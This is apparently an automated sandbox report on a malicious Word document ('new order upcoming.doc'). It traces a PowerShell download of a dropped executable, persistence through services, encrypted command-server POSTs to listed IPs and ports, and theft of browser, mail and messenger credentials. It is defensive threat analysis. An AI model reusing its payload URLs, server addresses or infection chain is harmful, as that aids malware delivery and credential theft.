Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:33605
Start time:19:34:12
Joe Sandbox Product:CloudBasic
Start date:06.10.2017
Overall analysis duration:0h 14m 1s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:new order upcoming.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:17
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • VBA Instrumentation enabled
Detection:MAL
Classification:mal100.evad.expl.phis.spyw.troj.winDOC@25/11@1/5
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 57
  • Number of non-executed functions: 114
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 51.2% (good quality ratio 46.9%)
  • Quality average: 79.5%
  • Quality standard deviation: 31.6%
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Found new Word/Excel subprocess, stop clicking
  • Number of clicks 18
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample HTTP request are all non existing, likely the sample is no longer working
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for domain / URLShow sources
Source: marley.netvirustotal: Detection: 4%Perma Link
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\39530.exevirustotal: Detection: 56%Perma Link
Source: C:\Users\user\AppData\Local\Temp\39530.exemetadefender: Detection: 12%Perma Link
Antivirus detection for submitted fileShow sources
Source: new order upcoming.docvirustotal: Detection: 52%Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 5_2_003E22D4 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptExportKey,CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,5_2_003E22D4
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 5_2_003E21E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,5_2_003E21E4
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 5_2_003E2401 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,5_2_003E2401
Source: C:\Windows\System32\wlangdi.exeCode function: 7_2_002E8642 memset,_snwprintf,CreateMutexW,WaitForSingleObject,_snwprintf,_snwprintf,CreateMutexW,CreateEventW,SignalObjectAndWait,ResetEvent,ReleaseMutex,CloseHandle,GetTickCount,CreateTimerQueueTimer,WaitForSingleObject,DeleteTimerQueueTimer,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_002E8642
Source: C:\Windows\System32\wlangdi.exeCode function: 7_2_002E2401 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_002E2401
Source: C:\Windows\System32\wlangdi.exeCode function: 7_2_002E21E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_002E21E4
Source: C:\Windows\System32\wlangdi.exeCode function: 7_2_002E22D4 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptExportKey,CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_002E22D4
Source: C:\Windows\System32\QYIyP.exeCode function: 9_2_00A021E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_00A021E4
Source: C:\Windows\System32\QYIyP.exeCode function: 9_2_00A022D4 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptExportKey,CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_00A022D4
Source: C:\Windows\System32\QYIyP.exeCode function: 9_2_00A02401 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_00A02401

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 5_2_003E21E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,5_2_003E21E4
Source: C:\Windows\System32\wlangdi.exeCode function: 7_2_002E21E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_002E21E4
Source: C:\Windows\System32\QYIyP.exeCode function: 9_2_00A021E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_00A021E4

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: marley.net
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49167 -> 147.135.209.118:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49166 -> 69.195.124.165:80
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking:

barindex
Contains functionality to download additional files from the internetShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 5_2_003E1CCB HttpQueryInfoW,GetProcessHeap,RtlAllocateHeap,InternetReadFile,InternetReadFile,GetProcessHeap,HeapFree,5_2_003E1CCB
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /hlJm/ HTTP/1.1Host: marley.netConnection: Keep-Alive
Found strings which match to known social media urlsShow sources
Source: wlangdi.exeString found in binary or memory: 7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wlangdi.exeString found in binary or memory: 7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wlangdi.exeString found in binary or memory: Hotmail/MSN equals www.hotmail.com (Hotmail)
Source: wlangdi.exeString found in binary or memory: lcome.htmlres://C:%5CUsers%5CHERBBL~1%5CAppData%5CLocal%5CTemp%5Cjds796915.tmp%5Cjxpiinstall.exe/progress.htmlhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/54.0.1/win32/en-US/Firefox%20Setup%20Stub%2054.0.1.exehttps://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/res1.windows.microsoft.com/resources/4.2/wol/shared/images/favicon.icohttps://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/uihttps://www.mozilla.org/de/firefox/newhttps://www.mozilla.org/en-US/firefox/newhttps://www.mozilla.org/en-US/firefox/new/?scene=2https://www.mozilla.org/en-US/firefox/new/res://C:\Users\user\Downloads\flashplayer26_xa_install.exe/160https://support.microsoft.com/products/internet-explorerhttps://support.microsoft.com/internet-explorerhttps://support.microsoft.com/en-us/products/internet-explorerres://C:\Users\user\Downloads\readerdc_en_xa_crd_install.exe/160https://c1.microsoft.com/c.gif?DI=4050&did=1&t=https://c1.microsoft.com/c.gifhttps://adobe-d.openx.net/w/1.0/afr?auid=463664&cb=INS
Source: wlangdi.exeString found in binary or memory: lcome.htmlres://C:%5CUsers%5CHERBBL~1%5CAppData%5CLocal%5CTemp%5Cjds796915.tmp%5Cjxpiinstall.exe/progress.htmlhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/54.0.1/win32/en-US/Firefox%20Setup%20Stub%2054.0.1.exehttps://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/res1.windows.microsoft.com/resources/4.2/wol/shared/images/favicon.icohttps://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/uihttps://www.mozilla.org/de/firefox/newhttps://www.mozilla.org/en-US/firefox/newhttps://www.mozilla.org/en-US/firefox/new/?scene=2https://www.mozilla.org/en-US/firefox/new/res://C:\Users\user\Downloads\flashplayer26_xa_install.exe/160https://support.microsoft.com/products/internet-explorerhttps://support.microsoft.com/internet-explorerhttps://support.microsoft.com/en-us/products/internet-explorerres://C:\Users\user\Downloads\readerdc_en_xa_crd_install.exe/160https://c1.microsoft.com/c.gif?DI=4050&did=1&t=https://c1.microsoft.com/c.gifhttps://adobe-d.openx.net/w/1.0/afr?auid=463664&cb=INS
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: marley.net
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 147.135.209.118:443Content-Length: 324Connection: Keep-AliveCache-Control: no-cacheData Raw: 4b 5c d4 e8 db 68 10 c4 10 2a 66 d3 23 07 2f aa 28 11 b7 82 49 9c ff 44 c1 71 db 1e 70 f6 1a 92 54 a1 7c cf dc 9d 9d 40 b9 71 a4 fc 1b 04 f7 2f da 3b 7d f9 1b 63 91 f2 c1 f5 02 9c 8f 4c cc 15 c3 ce 1f 2f 3c de 56 15 b0 c1 2d 6f 7e 0a 98 0d f1 e3 c2 86 4b be ac 96 01 df fe 50 58 a0 a2 e5 64 a0 55 0d 95 25 d1 e1 48 be 9f cf 87 5a 23 5b 1e 0e cd 5a 02 a1 22 2f b4 7c c9 c9 84 31 2d 39 35 fa 91 69 fa cf f7 01 57 92 6f 89 d0 3c 82 8f 40 1b 1b f1 60 68 a8 28 25 c7 5c 00 82 15 ed 95 9b a0 35 cc 1a 1c 08 9b b3 fd 34 50 6f 5c 9b 10 b4 9f df 70 61 b3 28 43 2c 32 4e f6 a7 75 8e 00 51 39 20 de 28 af 5e 60 98 3b 92 1f 59 2f e3 d3 0c 9b 25 59 80 2c fe 02 23 99 88 3a db 81 8f 11 39 b7 b7 69 35 13 b7 2f bc 8a e4 3d 41 f0 6f
Tries to download non-existing http data (HTTP/1.1 404 Not Found)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 06 Oct 2017 17:35:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 61908Connection: keep-aliveData Raw: 8d a8 74 9d 75 38 54 2f b9 38 11 6b 09 5f 95 9c 64 c7 26 c2 43 ec 01 82 b2 86 24 0d 22 47 1f 3b c6 a2 b3 08 7d 09 f2 93 fb 4c f6 94 9c 41 fb 55 68 36 f5 71 e7 da d6 af 88 71 31 b6 25 5c 62 d0 a4 88 ab 97 ea 56 69 f0 42 39 e4 61 4f 0f 0a f3 44 f4 9b 76 53 a9 04 cc 09 88 99 d8 c4 53 12 a3 87 a5 78 b0 c4 09 d0 07 99 30 80 84 50 cd a5 ba 02 41 e0 3d f6 76 07 4f 37 50 21 ba 56 ee e8 c3 9c 3c be c1 a4 ed 74 c7 87 33 0f f4 2a 34 ac 28 89 c4 a4 66 4c 3a 25 e4 71 4d f1 7e 72 52 40 8b 46 b4 f3 a6 54 1d 34 d9 52 f0 cb e3 a5 ab d3 86 9a 95 10 24 6b a5 b7 e4 82 fe 9a e7 f2 72 1f 96 c4 b7 07 3d 5c 0a 51 2e d6 df 1c 72 31 5f 00 a9 56 76 05 91 43 f8 ce 59 17 48 48 74 c2 d2 83 2e 5b 07 d3 f6 a0 b0 2f 67 a9 b8 4e d3 a8 96 c8 bf 83 e2 f6 0f 9a f3 bc 6f 42 0d d6 84 68 0a 65 63 42 94 da b0 9c 95 4d 9a 92 38 48 bb b0 d8 8e 1a 6b 3d a8 14 e3 29 e1 c4 26 16 80 cc
Urls found in memory or binary dataShow sources
Source: powershell.exeString found in binary or memory: file://
Source: WINWORD.EXE, powershell.exeString found in binary or memory: file:///
Source: WINWORD.EXEString found in binary or memory: file:///c:
Source: WINWORD.EXEString found in binary or memory: file:///c:/users/herb%20blackburn/desktop/new%20order%20upcoming.doc
Source: powershell.exeString found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/n
Source: powershell.exeString found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/x
Source: powershell.exeString found in binary or memory: http://
Source: powershell.exeString found in binary or memory: http://austx
Source: powershell.exeString found in binary or memory: http://austxport.com.au/redbeandesign/zaw/
Source: wlangdi.exeString found in binary or memory: http://crl4.digicert.com/digicerthighassuranceevrootca.crl0=
Source: powershell.exeString found in binary or memory: http://ctmket.com/fwdbho/
Source: powershell.exeString found in binary or memory: http://d
Source: powershell.exeString found in binary or memory: http://deinc.com/uqpkzqxqq/
Source: wlangdi.exeString found in binary or memory: http://https://:stringdatawininetcachecredentialsftp://dpapi:captionmenu_%ddialog_%dstringsgeneralsy
Source: powershell.exeString found in binary or memory: http://marley.ne
Source: powershell.exeString found in binary or memory: http://marley.net
Source: powershell.exeString found in binary or memory: http://marley.net/hljm/
Source: powershell.exeString found in binary or memory: http://marley.netx&zk8
Source: powershell.exeString found in binary or memory: http://marley.nex
Source: wlangdi.exeString found in binary or memory: http://ocsp.digicert.com0k
Source: powershell.exeString found in binary or memory: http://q-productions.com/jkxhsksgj/
Source: powershell.exeString found in binary or memory: http://q-productions.com/jkxhsksgj/t
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponse
Source: wlangdi.exeString found in binary or memory: http://t1.symcb.com/thawtepca.crl0/
Source: wlangdi.exeString found in binary or memory: http://t2.symcb.com0a
Source: wlangdi.exeString found in binary or memory: http://www.nirsoft.net/
Source: wlangdi.exeString found in binary or memory: https://download-installer.cdn.mozilla.net/pub/firefox/releases/54.0.1/win32/en-us/firefox%20setup%2
Source: wlangdi.exeString found in binary or memory: https://www.digicert.com/cps0
Source: wlangdi.exeString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/l
Source: wlangdi.exeString found in binary or memory: https://www.thawte.com/cps0)
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /hlJm/ HTTP/1.1Host: marley.netConnection: Keep-Alive
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 147.135.209.118:443Content-Length: 324Connection: Keep-AliveCache-Control: no-cacheData Raw: 4b 5c d4 e8 db 68 10 c4 10 2a 66 d3 23 07 2f aa 28 11 b7 82 49 9c ff 44 c1 71 db 1e 70 f6 1a 92 54 a1 7c cf dc 9d 9d 40 b9 71 a4 fc 1b 04 f7 2f da 3b 7d f9 1b 63 91 f2 c1 f5 02 9c 8f 4c cc 15 c3 ce 1f 2f 3c de 56 15 b0 c1 2d 6f 7e 0a 98 0d f1 e3 c2 86 4b be ac 96 01 df fe 50 58 a0 a2 e5 64 a0 55 0d 95 25 d1 e1 48 be 9f cf 87 5a 23 5b 1e 0e cd 5a 02 a1 22 2f b4 7c c9 c9 84 31 2d 39 35 fa 91 69 fa cf f7 01 57 92 6f 89 d0 3c 82 8f 40 1b 1b f1 60 68 a8 28 25 c7 5c 00 82 15 ed 95 9b a0 35 cc 1a 1c 08 9b b3 fd 34 50 6f 5c 9b 10 b4 9f df 70 61 b3 28 43 2c 32 4e f6 a7 75 8e 00 51 39 20 de 28 af 5e 60 98 3b 92 1f 59 2f e3 d3 0c 9b 25 59 80 2c fe 02 23 99 88 3a db 81 8f 11 39 b7 b7 69 35 13 b7 2f bc 8a e4 3d 41 f0 6f
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.1.78.129:8080Content-Length: 340Connection: Keep-AliveCache-Control: no-cacheData Raw: 3a e7 ac 7e ed 87 d1 9d 6f 63 5d 13 87 bf 22 64 d1 2f ff a4 ec 47 68 c7 d4 8d 5a 39 b5 68 91 9b 20 9c 9f bd 61 1f a8 f9 bb 30 c3 9a 5c 20 33 cf a9 17 9a a5 b0 56 d7 88 5d dc 41 0b e3 1f b6 b0 aa 89 55 c6 6e 2a 8a 22 f5 bb 50 fe 99 50 73 cd 35 ea 3b 0e f7 3d ec fe fe 7a 18 4a 72 76 5c f2 e9 a2 f6 e2 7a c6 ad 21 55 b7 02 8b d4 c1 e5 52 93 f3 65 ac f9 c3 c4 dd 93 8e 86 4a a2 04 5a 91 fa 26 65 0d db b3 cd 00 d3 a7 50 a6 ab a2 3d 11 09 51 6f be fe ad 3e 6f 98 8f c0 c6 19 f5 01 a7 56 cb ca a7 11 6d f2 ab b4 19 b5 7c a6 c9 23 d5 c8 fc 15 d0 c0 b7 53 c2 8d ea 09 bc e3 8a bf 83 15 1c 60 17 53 5b 66 eb d2 35 bb 15 34 97 d2 d7 f3 f1 bf 07 5d 7c 64 08 08 03 d9 a5 7f c9 8c 97 b8 09 c2 dc 1f 77 75 04 7b d8 4b a7 55 ee 39 7
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 46.4.67.203:7080Content-Length: 324Connection: Keep-AliveCache-Control: no-cacheData Raw: 0c 87 9c c6 b9 4b f8 dd a9 dc 11 00 7b d8 ef cf 5a 68 b6 73 d9 97 ce 85 29 fa c4 95 09 0e 25 02 ef 7a 0a 49 cb fa a9 76 34 20 9b cf 9f c2 07 fd 77 53 fc 17 7c 07 7d dd ee 18 d2 0e e4 cc 63 27 63 0b 33 a4 2c 0a 1b 6d 6e 62 ba 35 44 95 e9 3e d5 8d ff fb 05 ed 6d c4 c2 6e 5c 1c ff 9a 0d c9 79 c0 fe 55 b8 38 e3 fe 8a 30 8e f2 2f f6 81 51 a2 5e fb 06 b6 fd 97 78 d0 7e 10 1f 03 fb 47 f4 b2 d1 7a ab a5 9f da 5d 6a da 84 19 d8 ab 2e a0 e8 86 ac 02 78 0d 45 38 c4 b5 d3 bb 23 79 1f 3c 59 1a 93 fc b7 4c 00 70 42 d8 b4 e1 82 b4 02 e5 5e 79 dc 39 5a 4e 68 ff 86 45 42 1d b2 75 1d 03 13 a2 ba c3 f7 48 c6 82 90 4c dd 20 ec 86 d8 11 96 09 b2 77 27 98 a8 8d 79 b7 8f d0 fb 21 75 d1 d0 87 b1 10 bc ae ac 61 48 4d 14 eb d9 7e d5 af
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 46.4.67.203:7080Content-Length: 340Connection: Keep-AliveCache-Control: no-cacheData Raw: a8 ad cb 27 5e 7b bd eb b1 69 0e 70 94 3c 40 cb 94 fc 1a 02 3e 89 e3 43 57 48 08 9a 50 27 80 75 f8 0b 60 bb b7 15 7f 98 b8 b2 e3 14 9a 19 de d4 8d 68 43 25 29 63 f6 a2 6b 64 48 39 8b 42 83 34 a7 92 a3 63 d1 6f 39 f0 15 3a 6e 07 e6 ef 5a c4 97 31 83 88 7b d5 36 f6 40 dc 0c 82 42 ff a9 f5 b1 94 a4 9c e1 1e 3b 37 2a 5c b2 41 e9 40 05 91 20 db 5c 47 05 b5 f4 f4 b1 7b f2 99 d3 63 df 40 bd 5b cb a3 f8 b7 7f 65 11 c3 47 44 02 05 4f 32 c2 43 1d 41 1e ca 2d a6 69 4a b6 2d 38 c8 27 25 fd dd a3 86 f7 45 a8 e8 95 da 74 b6 7c 60 e7 eb 39 3c e5 38 66 c6 d1 fc 5b c5 9f 4b af d1 e1 4d ad 44 a6 52 5c d2 a9 0f 7d b0 ed 7b 7d 18 54 3d 71 b8 c6 9c 20 5d 8e 87 bc 3a 76 80 14 12 35 7a ba c2 3d f8 27 42 e5 3d c6 95 10 85 c0 a3 29 c1
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.2:49168 -> 198.1.78.129:8080
Source: global trafficTCP traffic: 192.168.2.2:49169 -> 46.4.67.203:7080
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 7080
Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 7080
Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49169

Boot Survival:

barindex
Contains functionality to start windows servicesShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 5_2_003E8ABC lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,5_2_003E8ABC

Stealing of Sensitive Information:

barindex
Searches for Windows Mail specific filesShow sources
Source: C:\Windows\System32\wlangdi.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\System32\wlangdi.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\System32\wlangdi.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\System32\wlangdi.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\System32\wlangdi.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\System32\wlangdi.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\System32\wlangdi.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\System32\wlangdi.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\System32\wlangdi.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\System32\wlangdi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\System32\wlangdi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db
Source: C:\Windows\System32\wlangdi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\wlangdi.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\4ah7hlda.default\cert7.db
Source: C:\Windows\System32\wlangdi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db
Source: C:\Windows\System32\wlangdi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db
Source: C:\Windows\System32\wlangdi.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db
Source: C:\Windows\System32\wlangdi.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db
Source: C:\Windows\System32\wlangdi.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\places.sqlite
Tries to steal Instant Messenger accounts or passwordsShow sources
Source: C:\Windows\System32\wlangdi.exeKey opened: HKEY_USERS\Software\Google\Google Talk\Accounts
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Windows\System32\wlangdi.exeKey opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\System32\wlangdi.exeKey opened: HKEY_USERS\Identities\{C989D9FB-AC77-4182-809E-7F5679D38F00}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\System32\wlangdi.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\System32\wlangdi.exeKey opened: HKEY_USERS\Software\IncrediMail\Identities
Source: C:\Windows\System32\wlangdi.exeKey opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Windows\System32\wlangdi.exeKey opened: HKEY_USERS\Software\Microsoft\Windows Live Mail
Source: C:\Windows\System32\wlangdi.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NULL
Source: C:\Windows\System32\wlangdi.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NULL
Source: C:\Windows\System32\wlangdi.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\System32\wlangdi.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\System32\wlangdi.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\wlangdi.exeFile created: C:\Windows\System32\QYIyP.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\39530.exe
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Windows\System32\wlangdi.exeFile created: C:\Windows\System32\QYIyP.exe
May use bcdedit to modify the Windows boot settingsShow sources
Source: wlangdi.exeBinary or memory string: 7bcdedit.exe)
